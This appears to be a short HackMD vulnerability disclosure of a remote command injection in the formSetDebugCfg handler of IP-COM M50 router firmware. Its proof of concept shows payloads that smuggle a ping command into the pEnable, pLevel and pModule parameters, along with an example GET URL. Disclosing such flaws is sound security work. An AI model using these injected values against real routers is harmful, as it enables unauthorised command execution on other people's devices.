Try   HackMD

ip-com-2

vendor:IP-COM

product:M50

version:V15.11.0.33(10768)

type:Remote Command Injection

author:Yifeng Li, Wolin Zhuang;

Vulnerability description

We found an Command Injection vulnerability in IP-COM Technology IP-COM’s M50 routers with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted GET request.

Remote Command Injection vulnerability

In formSetDebugCfg function, the parameter “pEnable”,"pLevel"and "pModule" is not filter the string delivered by the user, so we can control the pEnable such as “-h%0aping%20x.x.x.x%20-w%2-5%0a ” to attack the OS, and so on, we also can control the pLevel or pModule to attack it.

PoC

Remote Command Injection

We set the value of “pEnable”,"pLevel" or "pModule" as aaa;ping x.x.x.x; and the router will excute ping command.

example.com/action/setDebugCfg?enable=-h ping x.x.x.x -w%2-5

Last changed by 
Wolin Zhuang
0
3470
Published on HackMD